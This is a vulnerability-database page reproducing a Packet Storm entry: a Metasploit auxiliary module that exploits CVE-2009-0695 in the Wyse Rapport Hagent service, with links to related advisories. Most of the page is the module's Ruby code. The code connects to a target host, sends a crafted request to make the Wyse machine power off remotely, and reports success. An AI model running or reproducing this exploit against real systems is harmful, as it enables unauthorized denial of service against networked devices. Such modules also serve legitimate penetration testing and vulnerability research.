Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIt.soluniumPACKETSTORM:113683
HistoryJun 14, 2012 - 12:00 a.m.

Wyse Machine Remote Power Off Denial Of Service

2012-06-1400:00:00
it.solunium
packetstormsecurity.com
25

0.741 High

EPSS

Percentile

98.1%

JSON
`require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Wyse Machine Remote Power off (DOS)',  
'Description' => %q{  
This module exploits the Wyse Rapport Hagent service and cause  
remote power cycle (Power off the wyse machine remotely).  
},  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Author' => '[email protected]',  
'Version' => '$Revision: 14976 $',  
'References' =>  
[  
['CVE', '2009-0695'],  
['OSVDB', '55839'],  
['US-CERT-VU', '654545'],  
['URL', 'http://snosoft.blogspot.com/'],  
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],  
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],  
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],  
],  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Targets' =>  
[  
[ 'Wyse Linux x86', {'Platform' => 'linux',}],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jun 13 2012'  
))  
  
register_options(  
[  
Opt::RPORT(80),  
], self.class)  
end  
  
  
def run  
  
  
# Connect to the target service  
print_status("Connecting to the target #{rhost}:#{rport}")  
if connect  
print_status("Connected...")  
end  
  
# Parameters  
  
genmac = "00"+Rex::Text.rand_text(5).unpack("H*")[0]  
  
craft_req = '&V52&CI=3|'  
craft_req << 'MAC=#{genmac}|#{rhost}|'  
craft_req << 'RB=0|MT=3|'  
craft_req << '|HS=#{rhost}|PO=#{rport}|'  
craft_req << 'SPO=0|'  
  
# Send the malicious request  
sock.put(craft_req)  
  
# Download some response data  
resp = sock.get_once(-1, 10)  
print_status("Received: #{resp}")  
  
disconnect  
  
if not resp  
print_error("No reply from the target, this may not be a vulnerable system")  
return  
end  
  
if resp == '&00'  
print_status("#{rhost} execute command succefuly & power off.")  
return  
end  
  
#Exeptions  
rescue ::Rex::ConnectionRefused  
print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")  
rescue ::Rex::HostUnreachable  
print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")  
rescue ::Rex::ConnectionTimeout  
print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")  
rescue ::Errno::ECONNRESET, ::Timeout::Error  
print_status("#{rhost} not responding.")  
  
end  
end  
  
  
  
`

Related

packetstorm 1
cvelist 1
cve 1
exploitdb 1
prion 1
nvd 1
nessus 1
cert 1
packetstorm
packetstorm
Wyse Rapport Hagent Fake Hserver Command Execution
2009-10-28 00:00:00
cvelist
cvelist
CVE-2009-0695
2022-10-03 16:24:10
cve
cve
CVE-2009-0695
2022-10-03 16:24:10
exploitdb
exploitdb
Wyse Rapport Hagent Fake Hserver Command Execution
2010-11-11 00:00:00
prion
prion
Authentication flaw
2012-06-19 20:55:00
nvd
nvd
CVE-2009-0695
2012-06-19 20:55:02
nessus
nessus
Wyse Device Manager Buffer Overflow
2009-07-21 00:00:00
cert
cert
Wyse Device Manager (WDM) HServer and HAgent contain multiple vulnerabilities
2009-10-13 00:00:00

0.741 High

EPSS

Percentile

98.1%

JSON
Related for PACKETSTORM:113683
packetstorm1cvelist1cve1exploitdb1prion1nvd1nessus1cert1